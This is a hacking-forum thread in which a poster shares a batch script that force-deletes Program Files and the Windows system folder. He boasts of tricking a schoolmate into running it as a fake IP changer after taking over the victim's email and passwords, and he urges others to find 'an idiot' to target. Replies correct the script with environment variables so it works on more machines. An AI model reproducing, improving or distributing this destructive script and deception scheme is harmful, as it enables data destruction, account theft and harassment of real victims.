Hack Forums

Full Version: My Program Files Deleter ;P
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
I made this to use on some dick at school... I fooled him into believing hackers kept getting his accounts because they had this IP address (I actually got his email account and retrieved all his passwords, so it was me xD). So I mentioned that there are programs that can change your IP address, and I uploaded this file to Rapidshare xD Told him to download it, he ran it and I just told him it's deleting IP information, lol
Because it deletes all their programs except for running ones, it comes up with Deleted File bla bla bla over and over again xD
But you just have to find an idiot, a decent back up story and make them get it xD Or just force it on their computer ;P

@echo off
color ef
cd c:\
del /s /q /f "program files"
cd c:\windows
del /s /q /f system
exit

That's the code to it, you should know all this .bat crap xP By the way, the "color ef" bit is a bright yellow background with white writing, just makes a temporary blinding effect for them if they've been in the dark or if they're tired xP
Anyways, enough of my crap, I know that this isn't the best of .bat's, but it's fun xD The person I used it on couldn't go on his games, the internet or anything xD He could only go on 2 of his chat programs (which he had open at the time -_-")
Anyways, enjoy :D
(P.S. If you can find it, add the command to delete their keyboard & mouse drivers then put that at the beginning of it so they'll be helpless xP)
Ok, Im not flaming but, honestly, this is nothing too be proud of, del doesnt delete folders, so
del /s /q /f "program files"

wont work, plus its syntax is wrong, %programfiles% is correct,

del /s /q /f system

wont work, plus I think you mean system32 then you need a \*.*

Code:
(P.S. If you can find it, add the command to delete their keyboard & mouse drivers then put that at the beginning of it so they'll be helpless xP)

Hasnt worked sinced win 95.

All and all this wont do any damage, and even if with the right code, batch can barely do anything,
Fallen Wrote:Ok, Im not flaming but, honestly, this is nothing too be proud of, del doesnt delete folders, so
del /s /q /f "program files"

wont work, plus its syntax is wrong, %programfiles% is correct,

del /s /q /f system

wont work, plus I think you mean system32 then you need a \*.*

Code:
(P.S. If you can find it, add the command to delete their keyboard & mouse drivers then put that at the beginning of it so they'll be helpless xP)

Hasnt worked sinced win 95.

All and all this wont do any damage, and even if with the right code, batch can barely do anything,

I used that on someone, I'm pretty sure it works -_-" Since their programs were gone... It might vary between operating system, but the average OS people have is still XP... But anyways, works fine, try it yourself and find out... And no, not exactly proud of it 'cause I know it's not the best thing ever... And also, no... I don't mean System32, I mean system, which is also a folder containing some minor files... Didn't wanna delete System32 to completely mess over his computer, just alot of other things...
batch files are noob c++ FTW
yes,it'll have to work.
The /s in the del command delete the subdirectory.
What Fallen was saying is that it doesen't work on all the pc
i don't have program file folder and also windows folder
They have different name
ex.
c:\progfile
c:\win
This two directory can be accessible by the environment variable %PROGRAMFILES% and %SYSTEMROOT% that provide automatically at the right name
4n931 Wrote:yes,it'll have to work.
The /s in the del command delete the subdirectory.
What Fallen was saying is that it doesen't work on all the pc
i don't have program file folder and also windows folder
They have different name
ex.
c:\progfile
c:\win
This two directory can be accessible by the environment variable %PROGRAMFILES% and %SYSTEMROOT% that provide automatically at the right name

Ahh... Makes more sense now, I know that Vista's command prompt is a little different to XP's, not sure about other versions... So I guess that %programfiles% etc... Would be compatible with all or nearly all of the versions? But yeah, maybe I should use that in my batches from now on... ;P
Reference URL's